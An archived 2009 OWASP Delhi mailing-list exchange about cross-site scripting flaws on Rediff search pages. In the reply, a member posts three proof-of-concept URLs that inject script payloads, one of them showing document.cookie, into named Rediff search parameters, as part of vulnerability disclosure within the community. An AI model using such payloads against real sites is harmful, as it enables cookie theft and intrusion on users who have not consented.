[Owasp-delhi] Rediff Vulnerability

surendra.kumar at rbs.com surendra.kumar at rbs.com
Wed May 27 11:49:39 EDT 2009


Hi Abhay,

XSS Still exist in rediff search.
See below URL with POC.

http://search.rediff.com/imgsrch/default.php?MT=dalai%20lama&start=&perpage=6&page=1&filter=0&imgsize=%22%3E%3CSCRIPT%3Ealert(document.cookie)%3C%2FSCRIPT%3E




http://sitesearch.rediff.com/dirsrch/default.asp?MT=%22%3E%3Cscript%3Ealert(420)%3C/script%3E




http://search1.rediff.com/dirsrch/default.asp?src=web&MT=%2522%253E%253Cscript%253Ealert%28%27XSS%27%29%253C%2Fscript%253E






Thanks & Regards,
Surendra Kumar






"SISA Abhay Bhargav" <ab at sisa.co.in> 
Sent by: owasp-delhi-bounces at lists.owasp.org
05/27/2009 07:57 PM
Please respond to
abhay.bhargav at sisa.co.in


To
<owasp-delhi at lists.owasp.org>
cc

Subject
[Owasp-delhi] Rediff Vulnerability






Hi All
 
I am pleased to see that the Rediff Search XSS issue has been fixed. 
Although I reported the issue to Rediff, I would like to thank some 
members of OWASP Delhi for having taken the matter to a higher plane and 
reporting it to someone who has been proactive. 
 
Unfortunately, several other Rediff sites are as vulnerable to XSS as 
ever. I will probably go ahead and report this issue as well. Hopefully it 
gets sorted out as quickly as the previous one. 
 
Check it out: http://citadelnotes.blogspot.com
 
Regards
Abhay Bhargav
CISSP, CPA, CISA, PCI QSA, OCTAVE Implementer

SISA Information Security (P) Ltd| Ph 91 80 41153769| Fx 91 80 41153796
 
 
 
 _______________________________________________
Owasp-delhi mailing list
Owasp-delhi at lists.owasp.org
https://lists.owasp.org/mailman/listinfo/owasp-delhi



This message (including any attachments) is confidential and may be privileged. If you have received it by mistake please notify the sender by return e-mail and delete this message from your system. Any unauthorised use or dissemination of this message in whole or in part is strictly prohibited. Please note that e-mails are susceptible to change. ABN AMRO Central Enterprise Services Pvt Ltd, part of RBS Group plc , having its registered office at Empire Complex, 414 Senapati Bapat Marg, Lower Parel (W), Mumbai - 400 013 , including its group companies, shall not be liable for the improper or incomplete transmission of the information contained in this communication nor for any delay in its receipt or damage to your system. ABN AMRO Central Enterprise Services Pvt Ltd (or its group companies) does not guarantee that the integrity of this communication has been maintained nor that this communication is free of viruses, interceptions or interference.

______________________________________________________________________
This email has been scanned by the MessageLabs Email Security System.
For more information please visit http://www.messagelabs.com/email 
______________________________________________________________________
-------------- next part --------------
An HTML attachment was scrubbed...
URL: https://lists.owasp.org/pipermail/owasp-delhi/attachments/20090527/4bb4c0ff/attachment-0001.html 
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: image/jpeg
Size: 1875 bytes
Desc: not available
Url : https://lists.owasp.org/pipermail/owasp-delhi/attachments/20090527/4bb4c0ff/attachment-0004.jpe 
-------------- next part --------------
A non-text attachment was scrubbed...
Name: XSS_search_rediff_com_imgsearch.JPG
Type: image/jpeg
Size: 83847 bytes
Desc: not available
Url : https://lists.owasp.org/pipermail/owasp-delhi/attachments/20090527/4bb4c0ff/attachment-0005.jpe 
-------------- next part --------------
A non-text attachment was scrubbed...
Name: XSS_sitesearch_rediff_com.JPG
Type: image/jpeg
Size: 69693 bytes
Desc: not available
Url : https://lists.owasp.org/pipermail/owasp-delhi/attachments/20090527/4bb4c0ff/attachment-0006.jpe 
-------------- next part --------------
A non-text attachment was scrubbed...
Name: XSS_search1_rediff_com.JPG
Type: image/jpeg
Size: 64588 bytes
Desc: not available
Url : https://lists.owasp.org/pipermail/owasp-delhi/attachments/20090527/4bb4c0ff/attachment-0007.jpe 


More information about the Owasp-delhi mailing list